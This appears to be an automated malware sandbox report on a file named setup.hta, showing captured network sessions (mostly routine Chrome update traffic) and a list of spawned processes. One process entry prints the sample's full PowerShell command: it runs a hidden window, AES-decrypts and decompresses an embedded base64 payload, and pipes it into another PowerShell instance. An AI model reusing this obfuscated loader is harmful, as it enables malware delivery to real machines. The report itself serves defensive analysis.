2024-02-21 07:15:01 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-02-21 07:15:01 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49740	142.250.64.99	443	7220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:15:04 UTC	1300	OUT	POST /service/update2/json?cup2key=13:uJVABRORllRplTCz5XK_8uMYDGrdCFfsvv2k8BIw_4E&cup2hreq=93ca94a466fa1ce5fb584a16b1ad3e9d0805b90aae732883ddc733624cdce7db HTTP/1.1 Host: update.googleapis.com Connection: keep-alive Content-Length: 3784 X-Goog-Update-AppId: neifaoindggfcjicffkgpmnlppeffabd,gonpemdgkjcecdgbnaabipppbmgfggbe,ihnlcenocehgdaegdmhbidjhnhdchfmm,hnimpnehoodheedghdeeijklkeaacbdc,obedbbhbpmojnkanicioggnmelmoomoc,gcmjkmgdlgnkkcocmoeiminaijmmjnii,kiabhabjdbkjdpjbpigfodbdjmbglcoo,giekcmmlnklenlaomppkphknjmnnpneh,khaoiebndkojlmppeemjhbpbandiljpe,oimompecagnajdejgnnjijobebaeigek,llkgjffcdpffmhiakmfcdcblohccpfmo,hfnkpimlhhgieaddgfemjhofmfblmnib,laoigpblnllgcgjnjnllmfolckpjlhki,ehgidpndbllacpjalkiimkbadgjfnnmc,efniojlnjndmcbiieegkicadnoecjjef,jflookgnkcckhobaglndicnbbgbonegd,ggkkehgbnfjpeggfpleeakpidbkibbmn,jamhcnnkihinmdlkakkaopbjbbcngflc,ojhpjlocmbogdgmfpkhlaaeamibhnphh,eeigpngbgcognadeebkilcpcaedhellh,cocncanleafgejenidihemfflagifjic X-Goog-Update-Interactivity: bg X-Goog-Update-Updater: chrome-117.0.5938.132 Content-Type: application/json Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br
2024-02-21 07:15:04 UTC	3784	OUT	Data Raw: 7b 22 72 65 71 75 65 73 74 22 3a 7b 22 40 6f 73 22 3a 22 77 69 6e 22 2c 22 40 75 70 64 61 74 65 72 22 3a 22 63 68 72 6f 6d 65 22 2c 22 61 63 63 65 70 74 66 6f 72 6d 61 74 22 3a 22 63 72 78 33 2c 70 75 66 66 22 2c 22 61 70 70 22 3a 5b 7b 22 61 70 70 69 64 22 3a 22 6e 65 69 66 61 6f 69 6e 64 67 67 66 63 6a 69 63 66 66 6b 67 70 6d 6e 6c 70 70 65 66 66 61 62 64 22 2c 22 62 72 61 6e 64 22 3a 22 4f 4e 47 52 22 2c 22 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 55 53 22 2c 22 70 69 6e 67 22 3a 7b 22 72 22 3a 2d 32 7d 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 7d 2c 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 30 2e 30 2e 30 22 7d 2c 7b 22 5f 69 6e 74 65 72 6e 61 6c 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 73 65 74 73 22 3a 22 66 61 Data Ascii: {"request":{"@os":"win","@updater":"chrome","acceptformat":"crx3,puff","app":[{"appid":"neifaoindggfcjicffkgpmnlppeffabd","brand":"ONGR","enabled":true,"lang":"en-US","ping":{"r":-2},"updatecheck":{},"version":"0.0.0.0"},{"_internal_experimental_sets":"fa
2024-02-21 07:15:05 UTC	1135	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-3Phcju4IpIuI_f6RDPnIhw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 21 Feb 2024 07:15:05 GMT X-Cup-Server-Proof: 304402206ed7233a6a2fc6c4c11e77a3a091cc5642096884274edc63d0e21fe46d2b28dd022004c73bb4ca5cc58a890e005dbeceeb17342d4b7827876fc14260f063881a6235:93ca94a466fa1ce5fb584a16b1ad3e9d0805b90aae732883ddc733624cdce7db ETag: W/"304402206ed7233a6a2fc6c4c11e77a3a091cc5642096884274edc63d0e21fe46d2b28dd022004c73bb4ca5cc58a890e005dbeceeb17342d4b7827876fc14260f063881a6235:93ca94a466fa1ce5fb584a16b1ad3e9d0805b90aae732883ddc733624cdce7db" Content-Type: application/json; charset=utf-8 Content-Length: 22477 X-Daynum: 6259 X-Daystart: 83705 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-02-21 07:15:05 UTC	1252	IN	Data Raw: 29 5d 7d 27 0a 7b 22 72 65 73 70 6f 6e 73 65 22 3a 7b 22 73 65 72 76 65 72 22 3a 22 70 72 6f 64 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 33 2e 31 22 2c 22 64 61 79 73 74 61 72 74 22 3a 7b 22 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 22 3a 38 33 37 30 35 2c 22 65 6c 61 70 73 65 64 5f 64 61 79 73 22 3a 36 32 35 39 7d 2c 22 61 70 70 22 3a 5b 7b 22 61 70 70 69 64 22 3a 22 6e 65 69 66 61 6f 69 6e 64 67 67 66 63 6a 69 63 66 66 6b 67 70 6d 6e 6c 70 70 65 66 66 61 62 64 22 2c 22 63 6f 68 6f 72 74 22 3a 22 31 3a 31 32 39 39 3a 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 41 75 74 6f 22 2c 22 70 69 6e 67 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 7d 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 22 73 74 61 74 Data Ascii: )]}'{"response":{"server":"prod","protocol":"3.1","daystart":{"elapsed_seconds":83705,"elapsed_days":6259},"app":[{"appid":"neifaoindggfcjicffkgpmnlppeffabd","cohort":"1:1299:","status":"ok","cohortname":"Auto","ping":{"status":"ok"},"updatecheck":{"stat
2024-02-21 07:15:05 UTC	1252	IN	Data Raw: 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 6d 4d 64 44 68 6b 67 66 46 78 73 4a 79 35 53 51 4b 42 61 49 4f 53 37 76 76 39 30 5c 75 30 30 33 64 22 7d 5d 7d 7d 7d 7d 2c 7b 22 61 70 70 69 64 22 3a 22 67 6f 6e 70 65 6d 64 67 6b 6a 63 65 63 64 67 62 6e 61 61 62 69 70 70 70 62 6d 67 66 67 67 62 65 22 2c 22 63 6f 68 6f 72 74 22 3a 22 31 3a 7a 31 78 3a 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 41 75 74 6f 22 2c 22 70 69 6e 67 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 7d 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 75 72 6c 73 22 3a 7b 22 75 72 6c 22 3a 5b 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f Data Ascii: :true,"hash":"mMdDhkgfFxsJy5SQKBaIOS7vv90\u003d"}]}}}},{"appid":"gonpemdgkjcecdgbnaabipppbmgfggbe","cohort":"1:z1x:","status":"ok","cohortname":"Auto","ping":{"status":"ok"},"updatecheck":{"status":"ok","urls":{"url":[{"codebase":"http://edgedl.me.gvt1.co
2024-02-21 07:15:05 UTC	1252	IN	Data Raw: 22 61 70 70 69 64 22 3a 22 69 68 6e 6c 63 65 6e 6f 63 65 68 67 64 61 65 67 64 6d 68 62 69 64 6a 68 6e 68 64 63 68 66 6d 6d 22 2c 22 63 6f 68 6f 72 74 22 3a 22 31 3a 3a 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 22 2c 22 70 69 6e 67 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 7d 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6e 6f 75 70 64 61 74 65 22 7d 7d 2c 7b 22 61 70 70 69 64 22 3a 22 68 6e 69 6d 70 6e 65 68 6f 6f 64 68 65 65 64 67 68 64 65 65 69 6a 6b 6c 6b 65 61 61 63 62 64 63 22 2c 22 63 6f 68 6f 72 74 22 3a 22 31 3a 3a 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 22 2c 22 70 69 6e 67 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 Data Ascii: "appid":"ihnlcenocehgdaegdmhbidjhnhdchfmm","cohort":"1::","status":"ok","cohortname":"","ping":{"status":"ok"},"updatecheck":{"status":"noupdate"}},{"appid":"hnimpnehoodheedghdeeijklkeaacbdc","cohort":"1::","status":"ok","cohortname":"","ping":{"status":"
2024-02-21 07:15:05 UTC	342	IN	Data Raw: 34 39 32 5f 68 6e 69 6d 70 6e 65 68 6f 6f 64 68 65 65 64 67 68 64 65 65 69 6a 6b 6c 6b 65 61 61 63 62 64 63 2e 63 72 78 22 2c 22 66 70 22 3a 22 31 2e 36 66 36 62 63 39 33 64 63 64 36 32 64 63 32 35 31 38 35 30 64 32 66 66 34 35 38 66 64 61 39 36 30 38 33 63 65 62 37 66 62 65 38 65 65 62 31 31 32 34 38 62 38 34 38 35 65 66 32 61 65 61 32 33 22 2c 22 72 65 71 75 69 72 65 64 22 3a 74 72 75 65 7d 5d 7d 7d 7d 7d 2c 7b 22 61 70 70 69 64 22 3a 22 6f 62 65 64 62 62 68 62 70 6d 6f 6a 6e 6b 61 6e 69 63 69 6f 67 67 6e 6d 65 6c 6d 6f 6f 6d 6f 63 22 2c 22 63 6f 68 6f 72 74 22 3a 22 31 3a 73 36 66 3a 32 30 6f 6c 40 30 2e 35 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 41 75 74 6f 22 2c 22 70 69 6e 67 22 3a 7b 22 73 74 61 74 Data Ascii: 492_hnimpnehoodheedghdeeijklkeaacbdc.crx","fp":"1.6f6bc93dcd62dc251850d2ff458fda96083ceb7fbe8eeb11248b8485ef2aea23","required":true}]}}}},{"appid":"obedbbhbpmojnkanicioggnmelmoomoc","cohort":"1:s6f:20ol@0.5","status":"ok","cohortname":"Auto","ping":{"stat
2024-02-21 07:15:05 UTC	1252	IN	Data Raw: 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 68 69 6f 6a 34 35 68 7a 6a 6b 66 75 6e 6e 37 63 63 72 62 71 79 79 68 75 33 71 5f 32 30 32 33 30 39 31 36 2e 35 36 37 38 35 34 36 36 37 2e 31 34 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 68 69 6f 6a 34 35 68 7a 6a 6b 66 75 6e 6e 37 63 63 72 62 71 79 79 68 75 33 71 5f 32 30 32 33 30 39 31 36 2e 35 36 37 38 35 34 36 36 37 2e 31 34 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 64 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 Data Ascii: 1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567854667.14/"},{"codebase":"https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567854667.14/"},{"codebase":"http://dl.google.com/r
2024-02-21 07:15:05 UTC	1252	IN	Data Raw: 22 2c 22 75 72 6c 73 22 3a 7b 22 75 72 6c 22 3a 5b 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 33 72 6d 33 63 69 71 73 33 66 6a 72 34 62 63 34 78 35 76 77 75 69 6c 64 65 71 5f 39 2e 34 39 2e 31 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 33 72 6d 33 63 69 71 73 33 66 6a 72 34 62 63 34 78 35 76 77 75 69 6c 64 65 71 5f 39 2e 34 39 2e 31 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 Data Ascii: ","urls":{"url":[{"codebase":"http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad3rm3ciqs3fjr4bc4x5vwuildeq_9.49.1/"},{"codebase":"https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad3rm3ciqs3fjr4bc4x5vwuildeq_9.49.1/"},{"codebase":"ht
2024-02-21 07:15:05 UTC	1252	IN	Data Raw: 65 6e 74 2f 61 64 77 65 34 32 35 78 6c 7a 71 33 32 67 78 6c 35 62 77 32 34 71 64 6f 6c 62 64 61 5f 32 30 32 34 2e 31 2e 32 2e 31 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 77 65 34 32 35 78 6c 7a 71 33 32 67 78 6c 35 62 77 32 34 71 64 6f 6c 62 64 61 5f 32 30 32 34 2e 31 2e 32 2e 31 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 64 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 77 65 34 32 35 78 6c 7a 71 33 32 67 78 6c 35 62 77 32 34 71 64 6f 6c 62 64 61 5f 32 30 32 Data Ascii: ent/adwe425xlzq32gxl5bw24qdolbda_2024.1.2.1/"},{"codebase":"https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adwe425xlzq32gxl5bw24qdolbda_2024.1.2.1/"},{"codebase":"http://dl.google.com/release2/chrome_component/adwe425xlzq32gxl5bw24qdolbda_202
2024-02-21 07:15:05 UTC	1252	IN	Data Raw: 70 3a 2f 2f 72 65 64 69 72 65 63 74 6f 72 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 41 49 5a 6b 38 4f 37 43 76 32 55 55 62 78 63 5f 61 61 55 79 6b 4b 49 5f 37 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 41 49 5a 6b 38 4f 37 43 76 32 55 55 62 78 63 5f 61 61 55 79 6b 4b 49 5f 37 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 64 69 72 65 63 74 6f 72 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d Data Ascii: p://redirector.gvt1.com/edgedl/release2/chrome_component/AIZk8O7Cv2UUbxc_aaUykKI_7/"},{"codebase":"https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AIZk8O7Cv2UUbxc_aaUykKI_7/"},{"codebase":"https://redirector.gvt1.com/edgedl/release2/chrome_com
2024-02-21 07:15:05 UTC	1252	IN	Data Raw: 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 63 65 7a 79 6a 79 74 32 66 70 32 78 35 33 64 68 79 71 62 76 74 33 67 78 64 6c 71 5f 36 33 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 64 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 63 65 7a 79 6a 79 74 32 66 70 32 78 35 33 64 68 79 71 62 76 74 33 67 78 64 6c 71 5f 36 33 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 Data Ascii: se":"https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acezyjyt2fp2x53dhyqbvt3gxdlq_63/"},{"codebase":"http://dl.google.com/release2/chrome_component/acezyjyt2fp2x53dhyqbvt3gxdlq_63/"},{"codebase":"https://dl.google.com/release2/chrome_component

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49744	142.250.64.78	443	7220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:15:34 UTC	449	OUT	GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=000000000000000000000000000000000000000002512400CC HTTP/1.1 Host: clients1.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br
2024-02-21 07:15:34 UTC	817	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-IW7mSz5gXc5Fgua1EcbU8w' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1 Content-Security-Policy: script-src 'report-sample' 'nonce-DZBHmG59303xeBSoU7hSEQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1 Content-Type: text/plain; charset=utf-8 Content-Length: 220 Date: Wed, 21 Feb 2024 07:15:34 GMT Expires: Wed, 21 Feb 2024 07:15:34 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-02-21 07:15:34 UTC	220	IN	Data Raw: 72 6c 7a 43 31 3a 20 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 0a 72 6c 7a 43 32 3a 20 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 0a 72 6c 7a 43 37 3a 20 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 0a 64 63 63 3a 20 0a 73 65 74 5f 64 63 63 3a 20 43 31 3a 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 2c 43 32 3a 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 2c 43 37 3a 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 0a 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 2c 43 31 53 2c 43 37 53 0a 73 74 61 74 65 66 75 6c 2d 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 0a 63 72 63 33 32 3a 20 37 30 65 61 35 65 61 35 0a Data Ascii: rlzC1: 1C1ONGR_enUS1098rlzC2: 1C2ONGR_enUS1098rlzC7: 1C7ONGR_enUS1098dcc: set_dcc: C1:1C1ONGR_enUS1098,C2:1C2ONGR_enUS1098,C7:1C7ONGR_enUS1098events: C1I,C2I,C7I,C1S,C7Sstateful-events: C1I,C2I,C7Icrc32: 70ea5ea5

Target ID:	0
Start time:	08:13:59
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\setup.hta"
Imagebase:	0xa20000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:14:00
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ \| powershell -
Imagebase:	0xd90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:14:00
Start date:	21/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:14:01
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
Imagebase:	0xd90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
